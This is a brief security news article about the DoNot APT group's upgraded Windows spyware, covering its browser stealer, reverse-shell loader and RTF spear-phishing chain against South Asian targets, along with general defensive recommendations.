Sophisticated DoNot APT group upgrades its malware

August 24, 2022
Sophisticated DoNot APT Threat Group Malware Spyware

The DoNot advanced persistent threat (APT) group has reemerged in the cybercriminal landscape with upgraded tricks, techniques, and procedures in their attacks. The DoNot APT, also known as APT-C-35, has been active for more than five years and is notorious for targeting numerous individuals and organisations in South Asia.

The APT group has included new modules in its Windows spyware framework (TYY/Jaca). These new malware samples are already utilised in the wild. In addition, the new modules are a browser stealer component and a new shellcode loader component that analyses a new DLL strain of the reverse shell.

Based on multiple reports from the recent samples, the browser stealer component can harvest information such as saved history and login credentials from Mozilla Firefox and Google Chrome.

 

DoNot APT also introduces its new infection process to compromise its targets.

 

According to an analysis, the late infection chain of the DoNot is a new module to the Windows framework. The group was spotted by researchers utilising RTF documents and targeted government sectors in the recent spear-phishing email campaign.

Once a target accesses these RTF documents, it will retrieve a malicious remote template from the command-and-control server by sending an HTTP GET command. If a remote template is added to the targeted system, the module will bait the target into allowing malicious macros inside the system.

The advanced persistent threat group will later utilise these macros in the later stages of the attack for deploying a reverse shell module. The new attack strategy of this threat group shows how a sophisticated team can effortlessly execute a complex operation and effectively corrupt its targeted entity.

Defending threats like the DoNot APT will need an in-depth defence tactic that is improved by multiple layers of security solutions and protocol. Experts also recommended that organisations implement security technologies such as XDR, EDR, and network firewalls to detect unwanted activities during the attack’s intrusion phase.

These security solutions can also be critical to an organisation’s safety since the group targets the security gaps that only a few organisations have plugged in.

About the author